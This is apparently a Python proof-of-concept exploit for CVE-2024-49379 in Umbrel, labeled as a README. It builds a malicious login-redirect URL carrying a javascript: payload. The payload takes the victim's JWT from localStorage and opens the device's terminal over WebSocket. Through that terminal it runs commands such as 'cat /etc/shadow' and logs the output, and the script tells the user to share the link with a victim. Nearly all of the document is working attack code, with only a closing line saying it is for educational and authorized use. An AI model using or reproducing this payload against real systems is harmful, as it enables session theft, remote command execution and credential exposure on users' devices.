README.md
Rendering markdown...
import urllib.parse
# ASCII Banner
def print_banner():
banner = """
_____ _____ _____ _____ _____
| __ \| __ \ / ____| |_ _| | __ \
| |__) | |__) | (___ | | _ __ | |__) |
| ___/| _ / \___ \ | | | '_ \ | ___/
| | | | \ \ ____) | _| |_| | | || |
|_| |_| \_\_____/ |_____|_| |_||_|
"""
print(banner)
print("PoC for CVE-2024-49379\n")
print("Discovered by Peter Stöckli (@p-) and the GitHub Security Lab team.")
print("PoC moved to Python for convenience in generation by S1REN.\n")
# Target configuration
target_url = "http://umbrel.local/login"
# Enhanced payload for robust exploitation
payload = (
"javascript:(function()%7B"
"let%20x%20=%20new%20WebSocket('ws://umbrel.local/terminal?appId=&rows=24&cols=80&token='"
".concat(window.localStorage.getItem('jwt')));"
"x.addEventListener('open',%20(e)%20=>%20%7B"
"x.send('echo%20Exploitation%20Started%20>%20/tmp/attack.log\\n');"
"x.send('uname%20-a%20>>%20/tmp/attack.log\\n');"
"x.send('id%20>>%20/tmp/attack.log\\n');"
"x.send('cat%20/etc/shadow%20>>%20/tmp/attack.log\\n');"
"x.send('echo%20Exploitation%20Complete%20>>%20/tmp/attack.log\\n');"
"%7D);"
"%7D)();"
)
def generate_malicious_url(base_url, injected_payload):
"""
Generate a URL with a malicious redirect parameter.
"""
params = {"redirect": injected_payload}
return f"{base_url}?{urllib.parse.urlencode(params)}"
if __name__ == "__main__":
# Print banner and shout-out
print_banner()
# Generate malicious URL
malicious_url = generate_malicious_url(target_url, payload)
print("[*] Share the following URL with the victim:")
print(malicious_url)
print("\n[*] Remember: This PoC is for educational and authorized testing purposes only.")